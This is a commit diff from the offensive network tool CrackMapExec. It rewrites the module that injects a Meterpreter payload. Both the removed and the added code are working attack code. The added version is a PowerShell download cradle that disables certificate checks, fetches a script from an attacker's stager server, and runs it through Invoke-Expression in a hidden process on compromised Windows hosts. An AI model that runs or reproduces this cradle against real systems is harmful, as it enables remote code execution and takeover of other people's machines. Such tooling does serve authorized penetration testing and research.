Merge branch 'v5-dev' of https://github.com/byt3bl33d3r/CrackMapExec

2020-05-03 14:32:17 -04:00 · 2020-05-03 14:32:17 -04:00 · 52528a44bb
parent 1308bc30c8 72338026ff
commit 52528a44bb
2 changed files with 31 additions and 52 deletions
--- a/cme/modules/met_inject.py
+++ b/cme/modules/met_inject.py
@ -14,63 +14,43 @@ class CMEModule:

    def options(self, context, module_options):
        '''
-            LHOST    IP hosting the handler
-            LPORT    Handler port
-            PAYLOAD  Payload to inject: reverse_http or reverse_https (default: reverse_https)
-            PROCID   Process ID to inject into (default: current powershell process)
+            SRVHOST     IP hosting of the stager server
+            SRVPORT     Stager port
+            RAND        Random string given by metasploit
+            SSL         Stager server use https or http (default: https)
        '''

-        self.met_payload = 'reverse_https'
-        self.procid = None
+        self.met_ssl = 'https'

-        if not 'LHOST' in module_options or not 'LPORT' in module_options:
-            context.log.error('LHOST and LPORT options are required!')
+        if not 'SRVHOST' in module_options or not 'SRVPORT' in module_options or not 'RAND' in module_options:
+            context.log.error('SRVHOST and SRVPORT  and RAND options are required!')
            exit(1)

-        if 'PAYLOAD' in module_options:
-            self.met_payload = module_options['PAYLOAD']
+        if 'SSL' in module_options:
+            self.met_ssl = module_options['SSL']

-        if 'PROCID' in module_options:
-            self.procid = module_options['PROCID']
-
-        self.lhost = module_options['LHOST']
-        self.lport = module_options['LPORT']
-
-        self.ps_script = obfs_ps_script('powersploit/CodeExecution/Invoke-Shellcode.ps1')
+        self.srvhost = module_options['SRVHOST']
+        self.srvport = module_options['SRVPORT']
+        self.rand = module_options['RAND']

    def on_admin_login(self, context, connection):
-        #PowerSploit's 3.0 update removed the Meterpreter injection options in Invoke-Shellcode
-        #so now we have to manually generate a valid Meterpreter request URL and download + exec the staged shellcode
-
-        payload = """$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {{[Char]$_}}
-        $SumTest = $False
-        while ($SumTest -eq $False)
-        {{
-            $GeneratedUri = $CharArray | Get-Random -Count 4
-            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
-        }}
-        $RequestUri = -join $GeneratedUri
-        $Request = "{}://{}:{}/$($RequestUri)"
-        $WebClient = New-Object System.Net.WebClient
-        [Byte[]]$bytes = $WebClient.DownloadData($Request)
-        Invoke-Shellcode -Force -Shellcode $bytes""".format('http' if self.met_payload == 'reverse_http' else 'https',
-                                                            self.lhost,
-                                                            self.lport)
-
-        if self.procid:
-            payload += " -ProcessID {}".format(self.procid)
-
-        launcher = gen_ps_iex_cradle(context, 'Invoke-Shellcode.ps1', payload, post_back=False)
-
-        connection.ps_execute(launcher, force_ps32=True)
+        # stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
+        command = """$url="{}://{}:{}/{}"
+        $DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
+        $PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\powershell.exe'
+        if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
+        $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
+        $ProcessInfo.FileName=$PowershellExe
+        $ProcessInfo.Arguments="-nop -c $DownloadCradle"
+        $ProcessInfo.UseShellExecute = $False
+        $ProcessInfo.RedirectStandardOutput = $True
+        $ProcessInfo.CreateNoWindow = $True
+        $ProcessInfo.WindowStyle = "Hidden"
+        $Process = [System.Diagnostics.Process]::Start($ProcessInfo)""".format(
+                'http' if self.met_ssl == 'http' else 'https', 
+                self.srvhost, 
+                self.srvport, 
+                self.rand)
+        context.log.debug(command)
+        connection.ps_execute(command, force_ps32=True)
        context.log.success('Executed payload')
-
-    def on_request(self, context, request):
-        if 'Invoke-Shellcode.ps1' == request.path[1:]:
-            request.send_response(200)
-            request.end_headers()
-            request.wfile.write(self.ps_script.encode())
-            request.stop_tracking_host()
-        else:
-            request.send_response(404)
-            request.end_headers()
--- a/cme/servers/http.py
+++ b/cme/servers/http.py
@ -90,7 +90,6 @@ class CMEServer(threading.Thread):
        self.server.shutdown()
        self.server.socket.close()
        self.server.server_close()
-        self._stop()

        # make sure all the threads are killed
        for thread in threading.enumerate():